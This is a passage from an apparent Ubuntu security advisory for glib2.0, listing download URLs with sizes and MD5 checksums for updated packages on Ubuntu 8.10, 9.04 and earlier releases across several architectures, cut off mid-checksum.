http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_i386.deb Size/MD5: 46706 5e4456b1527efd940e01c7aca7c65072 http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_i386.udeb Size/MD5: 1241052 ca6659a5062d06e9f95a794d25aa0bec lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_lpia.deb Size/MD5: 1126498 a8cf538453e395b610fd43a0e1d3995c http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_lpia.deb Size/MD5: 749728 b8ab5b52627b33a02dc628518f6e8cc1 http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_lpia.deb Size/MD5: 866292 d24055f7c9b3c22743b23b1db647f8c8 http://ports.ubuntu.com/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_lpia.deb Size/MD5: 46612 7b5d6df79a5cc8a2a776b0c67b30a889 http://ports.ubuntu.com/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_lpia.udeb Size/MD5: 1232302 fafbeb120762dfb6b82d401106729d21 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_powerpc.deb Size/MD5: 1166088 050d4dd8978470c1093993d6c90e596a http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_powerpc.deb Size/MD5: 825162 ecffe44dd39ccfd545503ca4a71fa7e0 http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_powerpc.deb Size/MD5: 1033488 700541c029701259dd63002d839e6b58 http://ports.ubuntu.com/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_powerpc.deb Size/MD5: 48212 365fa4ae6a0d78604327e3512fffb461 http://ports.ubuntu.com/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_powerpc.udeb Size/MD5: 1307814 dd8adeb8031b2bf15835c3c6ab294867 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_sparc.deb Size/MD5: 1031494 f32564a7f6e9690edacbf0f780cef5eb http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_sparc.deb Size/MD5: 781614 be1710dc92c6743fa361e5e3e09b1ef9 http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_sparc.deb Size/MD5: 954028 d0096984a450e243d3000477eb57fc68 http://ports.ubuntu.com/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_sparc.deb Size/MD5: 47426 adb02e18065700850fc14681a73ad940 http://ports.ubuntu.com/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_sparc.udeb Size/MD5: 1264164 2721162b1d7cb0a32ab3ba614d1be5c9 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.18.2-0ubuntu2.2.diff.gz Size/MD5: 35443 73649aa00b9d205898ae59e370fd9e9d http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.18.2-0ubuntu2.2.dsc Size/MD5: 1590 a926c661d9c479a13a4411142bbf3c72 http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.18.2.orig.tar.gz Size/MD5: 6792476 0f2bf241fc93d95a0bd599a9c2a352ca Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-data_2.18.2-0ubuntu2.2_all.deb Size/MD5: 958 99a3c187fb42b5474cbd9084bd0030d0 http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-doc_2.18.2-0ubuntu2.2_all.deb Size/MD5: 1152092 f2fe37185e9baeb1053d679532b8b065 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0-dbg_2.18.2-0ubuntu2.2_amd64.deb Size/MD5: 1248558 0e994c01e40a02dca07eb3e97dbc18bb http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0_2.18.2-0ubuntu2.2_amd64.deb Size/MD5: 842792 4b0ac82667ecef56cc860beccdee293e http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-dev_2.18.2-0ubuntu2.2_amd64.deb Size/MD5: 1027690 ab9170d2e4e7a59cbacda17f4cd26a83 http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libgio-fam_2.18.2-0ubuntu2.2_amd64.deb Size/MD5: 44238 f554baa4009cb2f94d3a772b61588a66 http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-udeb_2.18.2-0ubuntu2.2_amd64.udeb Size/MD5: 1401396 b03b104e47ef33b7dc39dcdeaf19be90 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0-dbg_2.18.2-0ubuntu2.2_i386.deb Size/MD5: 1173950 6fca09b423847cd228c54bfb2cae0b8f http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0_2.18.2-0ubuntu2.2_i386.deb Size/MD5: 771386 59fc2f39bf44711d3f71e931fac145d9 http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-dev_2.18.2-0ubuntu2.2_i386.deb Size/MD5: 910734 5b6b4f5f29cfdd0bc10feea8568fdc99 http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libgio-fam_2.18.2-0ubuntu2.2_i386.deb Size/MD5: 42770 2fc72afdfb182c5d98a6025c9781d50c http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-udeb_2.18.2-0ubuntu2.2_i386.udeb Size/MD5: 1330248 b35f040211be097dde97b42cfb670434 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0-dbg_2.18.2-0ubuntu2.2_lpia.deb Size/MD5: 1195246 1e0c8d42046bb26ca77faf7f33e273c3 http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0_2.18.2-0ubuntu2.2_lpia.deb Size/MD5: 760718 e2715639702d39739133dc050359afe3 http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-dev_2.18.2-0ubuntu2.2_lpia.deb Size/MD5: 901700 0ef039e50122f10423ef12cf0983541c http://ports.ubuntu.com/pool/universe/g/glib2.0/libgio-fam_2.18.2-0ubuntu2.2_lpia.deb Size/MD5: 42636 b958b2a50e892a45c950ad2b85a935b0 http://ports.ubuntu.com/pool/universe/g/glib2.0/libglib2.0-udeb_2.18.2-0ubuntu2.2_lpia.udeb Size/MD5: 1319542 25ac302084e325749e0b9fc1b4c7f0b3 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0-dbg_2.18.2-0ubuntu2.2_powerpc.deb Size/MD5: 1237952 1e714a4b235f51b8d36a458878fbe093 http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0_2.18.2-0ubuntu2.2_powerpc.deb Size/MD5: 845898 458dd666f452eb766156fbf3c6dad720 http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-dev_2.18.2-0ubuntu2.2_powerpc.deb Size/MD5: 1079876 8e0767a4ab92de24c1616ed8f4d528d3 http://ports.ubuntu.com/pool/universe/g/glib2.0/libgio-fam_2.18.2-0ubuntu2.2_powerpc.deb Size/MD5: 44050 45fe62276a6a3b92281969762601f78f http://ports.ubuntu.com/pool/universe/g/glib2.0/libglib2.0-udeb_2.18.2-0ubuntu2.2_powerpc.udeb Size/MD5: 1404280 9cb23943f8aa9e63e80fe489caecca64 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0-dbg_2.18.2-0ubuntu2.2_sparc.deb Size/MD5: 1077380 058daceb636ddcd10164358265cb24ff http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0_2.18.2-0ubuntu2.2_sparc.deb Size/MD5: 791034 83ee279d3e7824d6d39a2adfed996787 http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-dev_2.18.2-0ubuntu2.2_sparc.deb Size/MD5: 985278 cef0af3b99bf2da441e416e0b14e8352 http://ports.ubuntu.com/pool/universe/g/glib2.0/libgio-fam_2.18.2-0ubuntu2.2_sparc.deb Size/MD5: 43316 928da79d94b2fe648ae0eb8b88e0b91d http://ports.ubuntu.com/pool/universe/g/glib2.0/libglib2.0-udeb_2.18.2-0ubuntu2.2_sparc.udeb Size/MD5: 1349944 9cb36ac4a77838ba835e4054ebc8006a Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.20.1-0ubuntu2.1.diff.gz Size/MD5: 37116 868528ad6cb52e2d44545af18fc1ce68 http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.20.1-0ubuntu2.1.dsc Size/MD5: 1787 da3e90ca36741d5707fecf76e8721f5a http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.20.1.orig.tar.gz Size/MD5: 7130990 855be1b668ceaec3320c702212c95638 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-data_2.20.1-0ubuntu2.1_all.deb Size/MD5: 988 a45364a2d8509221d95b1ad8c1b06dd8 http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-doc_2.20.1-0ubuntu2.1_all.deb Size/MD5: 1173566 392137fd234e3b18599cd83cc23de82e amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0-dbg_2.20.1-0ubuntu2.1_amd64.deb Size/MD5: 1267456 ac0577ab5b